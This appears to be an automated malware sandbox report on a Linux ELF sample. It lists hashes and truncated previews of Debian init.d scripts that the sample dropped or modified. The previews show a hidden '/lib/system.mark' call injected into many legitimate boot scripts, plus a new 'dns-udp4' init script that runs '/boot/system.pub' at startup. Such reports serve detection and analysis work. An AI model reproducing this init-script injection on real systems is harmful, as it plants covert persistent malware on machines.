SHA1:	0141637CE3CE6E3401B3863FED8103F825427055
SHA-256:	44922CED598FFB90525BA2E3285418AE91C2788E4A3DEE0EEE1C3DBF8191AC96
SHA-512:	9BCD74E42D402FCA871BB0B7900821401FA5F229DE02D977D130A48D35BC088BAE03B8FE5D235EA3E1C0309B4B35DF069AA51F496BF8FD5406CDD4BCBCD7B12F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system.mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.912604701068792
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38ClAATDuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsYDT6MnidD/A3gU
MD5:	C47C5241A33BA37060C9A1A58C167E9E
SHA1:	9ED529B5EFC37F87EF208A43161D198838600310
SHA-256:	6EECCBE60DB542164C6E4F3ADB1291DF01D1502F9A12531D2CCD7A95A88F1712
SHA-512:	B01E7002EF994DF92650E51AA40438F636A8EEE1ABD5E6B6E65F64791CB78C49F412DDD29F82D5840ABDD917CF008713C7D2FBA0E929656ECF713DBB71B255AF
Malicious:	true
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.163687656510361
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrEcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKicr/ZkVyKDpjQ
MD5:	F59810FCEAD6967D3484941B757C5D9F
SHA1:	8E78AB09A2E17C4662DE668D65A620CBC4F2A95A
SHA-256:	3ABA882AD020C66D4F94787BB8CA8CE3F1C40CE725B4A8471009B561C0A951D0
SHA-512:	E99CD55831661A71CADD479321623D42FA9E22F8417F812C9357D229D5D3A76EDDA65B97D9A71C00C741EE910335CA3966637C5C6F6D154E8373CA154893CC22
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.162273569946851
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrEcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CBKYZkVyKDvjQ
MD5:	4D657844653E6118D801763C22C19937
SHA1:	6E7F91D90BAF86647698FA87FACD293CB345CF8B
SHA-256:	DF98C3C25E61F97881A20C39E5F44F544994FB3C56ACBBA6BE5F4BFEB6FD359E
SHA-512:	7915008586A4E3F57F8334E94F7A61E4FA3B51981AF2E0806B7AD2D9E0E6BBF8B321A3389D5A834EB73BF99957102A29DDF24841AA6D4E3354517A6668763CAA
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.228297603931064
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVj1I6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/FQRetsJ:7BWwmEMZVChVB7UoAaZUoGDvuG/UoGq/
MD5:	2A2270B6CC5B1BB95B8ED17ACC2C088E
SHA1:	E64F610A9E1145F5C930A7B2D1B31D9D301DF237
SHA-256:	A6854F423BD17C78AD8F61EDBED12417E1DE18CD8F35CB76295CE725CF888A99
SHA-512:	4D5A50E7EB4FB077574AD2B34C08D10270B5E5246A8C6D7D0CBFDDEC399093206C4D653C7AD6ACB0E211C037D5E4D45F5FC80DEA4CA8B5FB0E2A85C1759E9576
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.146376682341581
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFn2b:7j3FpjhnV5upSYuv3ScJp2b
MD5:	DA422CE81DD723C1511C06DA133FC27A
SHA1:	BBC3D860F2A391DCA48430C7C683D101463FA364
SHA-256:	1F549EBA5DB1AECF858178F62437651FDF2BA032890C4E65D204262DCCBB6F8E
SHA-512:	A4D88E11ECDD83D280131E788E2610DDA68AABEFF73E54C877341A034689B182A0B6D52DE00E0AB0177D7373740F8CCB16EABF98E17BDA643F2ECEEE3BC985A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.122590071157076
Encrypted:	false
SSDEEP:	96:9JOxb7pmQJ3sQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jwf7XMSIr7nXmL
MD5:	E85B436BDC8D0D1FAB58603A43BD7F55
SHA1:	53A674DE137A91FF396048EF8F09B0F306397136
SHA-256:	0FD1F38334022C7D46F8F429E0461DE6A6F20AC6BB4CF2B3C0C6DF6E44C0E92F
SHA-512:	8E285B86DE44C4FDDA957F903C9656E777D1F13D713EA84F7EAD5566D4093155E4836281710C855F5092F4C3B0DD9E5F808ABBBCFDE36F0911C732A669476A5D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system.mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/dns-udp4

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	168
Entropy (8bit):	5.03458455286979
Encrypted:	false
SSDEEP:	3:TKH/AnsKhWeftXWQfv+NjWRLQ6WYkREpFNF/ebzkRKVFOWSXKWRAIhQ4+:jsKhLtXpv+1W/a2eMJnKWmz
MD5:	2C9C7188232B53D595FD0541654BBCAC
SHA1:	7D0AAB87AD2A7663236C5A7251E9EFAB1C47437A
SHA-256:	C334828BE737392703EF01044BD122F47C9188E0443FC81413F1801486E0EE9F
SHA-512:	CC841292BF0A1AB588D701BC65AB199520209C82C3AD6038BC12AE7CF8537EDDDBD04E480F5CBF972A0731F64F531063ABEA2D1863E126B8C42C88960A2240C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash.### BEGIN INIT INFO.#chkconfig: 2345 10 90.#description:system.pub.# Default-Start: 2 3 4 5.# Default-Stop:.### END INIT INFO./boot/system.pub.exit 0

/etc/init.d/gdm3

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.045804889605048
Encrypted:	false
SSDEEP:	48:78unF1gLpANlduwTebFGB8B4ndfPaHa59zqPN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1aV3B5dNQaVAGvoe2Wtc
MD5:	979319372C9DA2093D245E5755FF36A6
SHA1:	9B5DD36873636794D6AE07792E7D4D9DED2C2489
SHA-256:	28C4D5946FDE3F9F7A846DA9F2E59F6A5A62FCECA7A527205F67A02478528D59
SHA-512:	89C92D9C74421B4AC6CE6BC46E09859CB72D836B69BDFE144FC8AA83D990FF135070D86C0A1FE225D8DB8CEE8756B67ABE8F117AB247EC7930B8C5E5A967DF0F
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system.mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.2621448888959215
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrFML6YRv50JDRABzNfuhCv8Z//UZJ7iu6052m3s:FtQlTd65tp6iNlLLRRQ4AsUk6o2mc
MD5:	A5AD832AE20F98254D6020CE444485FD
SHA1:	43408C17AB8386C42B777ED1E38A2C0D0D90FC7E
SHA-256:	52BF10B965E7EBBC956E2C1C10E8E4280278662428F634459607FDD51B4BBB97
SHA-512:	A54A09CD8B65D935F28B120AB5AD675FFB23447111D188F152F47FB5164B0D67A09BD25672F9967BABD74C19563F5F48FECE642E6D51ECC3D5088261FBFD8B1F
Malicious:	true
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1533815522152295
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZLLFFT7aTfNvagXQwj5jNvaYXakeQz:VZbxtXFZPKTfNvawtjNva4n
MD5:	D79E755001A5DB9E20CEDB6C961025F2
SHA1:	EDC19EC928BF4DAD45DA256670D819453BB58AE8
SHA-256:	11069209E8BB5F1A4C1241C0639C07EA11B31E688A7C045936161CFBE5D8FEA2
SHA-512:	4BF748BD107D2C3340FD95E05FF58B1F1B60C5248C427F0764CD5E99C9EC0495608BC8D0052803714CE2B85E38F9DA03A092AD94E04AF29B345D4721607582A1
Malicious:	true
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.999484335058729
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7dXCWQgxxsXuHtpyBMbtKxxsDBV/BkH5:92Z/WbZnm11LdyWFxKXuHtcBMbtKxKDc
MD5:	264DF0349838878E6A342635B4C6AAC6
SHA1:	FF2FC0C6330DACA16EAAA8FE91CB9B5A80EBA195
SHA-256:	CB5FA5A488AC0AE34080DAAA79AB37844BCBD9DFD374D6F9E1E9118245A8B3C7
SHA-512:	A187C35A0DC65DEA6591EE63954B84837A45B33F618BFD94AB8FCD030BC6828F9EE6B523158F5D26679BE651761C90378381D6CA0ACD55D5C477079DF8369AA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.973705475535796
Encrypted:	false
SSDEEP:	24:2Xx/YpMr8MICUV7OlfrDNhay+HNCNBlH3U8lrQ5l8u4uuzG:MpuMAMICu7OlN+UBlH3U8lc/ZWzG
MD5:	17D9A0A3EA1CD82B2A6A20441C80F070
SHA1:	620A0F1B6910A8599B70373E1395E7C72D31DFD1
SHA-256:	8E41D01C9F88FCA987C6F56E3BF127AB5A9B2D151AC688748B4E68318701BF5C
SHA-512:	0DCF1BFA3B51D299B5D3F581CE6AF6B85B95806CC4854EE16451F852AD85C3733A8AC9D1FD887CE01C77B926F762787913D4A8BC19DF7C0260D9E75B6DA5AB25
Malicious:	true
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.312093274159983
Encrypted:	false
SSDEEP:	48:9XfgD1yzyKzYcX/LshGJckS5MJAu8kGh5A9b6:9YQXC/w0SO
MD5:	4C516D25550878CE2CE024B6E97105DB
SHA1:	812E84ACA9890069BF1DBDEF175789DB8792F63D
SHA-256:	DE554C11A0C59B7354F88FD864DDFE7AE79BF3086319418BB27022B155693D85
SHA-512:	608967AF4BB7490885EA7E8EA8C5CFE2D38A7581FD3E9FE153793414063AC85079D1F3AA530650DF2D1ED47F7EA14A0D1BB38CA1F2F90627B03195D877F69335
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..

/etc/init.d/kmod

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2164
Entropy (8bit):	4.911228479541638
Encrypted:	false
SSDEEP:	24:+mUxLADBzBQYDMAKjqg3UlfbrMZC/tCYJGMsMHwDa1rig/re4NAGg0clXd:l/dtQYxKjRQfbF/oYJbJQAri6KYG
MD5:	17D2C5E15246E822C28D957F063D1A16
SHA1:	387E38EC5877238778209A18EA0D930709E7A603
SHA-256:	25B762063EFF997BB4FFA75852E3E26F08BA0419C341452BA86F17F6734A9448
SHA-512:	0CC8B7A4D72E05C3F4676B6DD84CF25A660E9E9821D367ACF0D3EE56461EC57441A317389F04A5D0B74415495A499F73FCC968B6A57134A92768D43395E86EBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] \|\| exit 0.[ -x /sbin/modprobe ] \|\| exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop\|restart\|reload\|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system.mark. log_action_msg "Loading kernel module $module". modprobe $module $args \|\| true. else. modprobe $module $args > /dev/null 2>&1 \|\| t

/etc/init.d/lightdm

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3534
Entropy (8bit):	5.284950933277381
Encrypted:	false
SSDEEP:	48:fbmo8vyUjH3J+cNrWId4KF9wDeXAr/FI/F7R7cJ0IBnrd/g1ZsbHaX1Z4td/Wzvx:d8z3J+cNiRFSzGhJHyUDuxTDld
MD5:	8134B3B7E43D4BBE6C1F3E7C7C73A7ED
SHA1:	156CCD1CF7176156A0AD84CDEB5B53868C81712F
SHA-256:	379A79FE27830ACAE74486161F85FD54A2CC176FEB57D6E48B988147A994403B
SHA-512:	7604BFF7FE0AE3CDFF0BE20F2E2CD84BA854EBB35829F6CC6EE6837E91F2F0347CB7E86CF831A1C524F6BC80CC9F34185E89F580A2F0D9F42364E5FC00E78960
Malicious:	true
Preview:	#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R

/etc/init.d/lm-sensors

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	901
Entropy (8bit):	5.104600839303824
Encrypted:	false
SSDEEP:	12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsQoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/Iwfi2Hjq13O
MD5:	4F5481561C2CB414FA79507BA03FDEF7
SHA1:	974F6AE6CE96EDBFA6247B47989CC4EA0D4C5CC6
SHA-256:	B8183CE4BF57A668EE504129E668E08DBE62FA0DDB7B7E42AABFF52FD7FBBB1D
SHA-512:	20B7254B833125FFD3449A402C534C9FF7C2A382C3407A35DC22A48B17352D7EFD767FF6A1C0A14FE8A70C2CCDED993A0695AC24D086036340267F4DA051C146
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM \|\| exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system.mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload\|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start\|stop\|restart\|force-reload\|status}"..exit 1.esac..exit 0..

/etc/init.d/lvm2-lvmpolld

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	604
Entropy (8bit):	5.317046519159889
Encrypted:	false
SSDEEP:	12:wdRDNeBuYryMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Xx/lti9OXylj/
MD5:	1BB719CD6C1AFE11FFAA22E457222B8B
SHA1:	8C6D68B8CFD06AD81813E9568F61C029F12D258A
SHA-256:	282EC5B6FC5F91FD0F569B1B84FA5DBA6C46173479A2A8F2F3B38A6DE6F570AF
SHA-512:	23015D67D978FA0C37E305E57D74DE0DA8C4E78436E3D0C640C52C355CB301A25799898C722FD6BDACF6BF85DE0A0E590CBC8C6624DD86D39AD59800BD6491E7
Malicious:	true
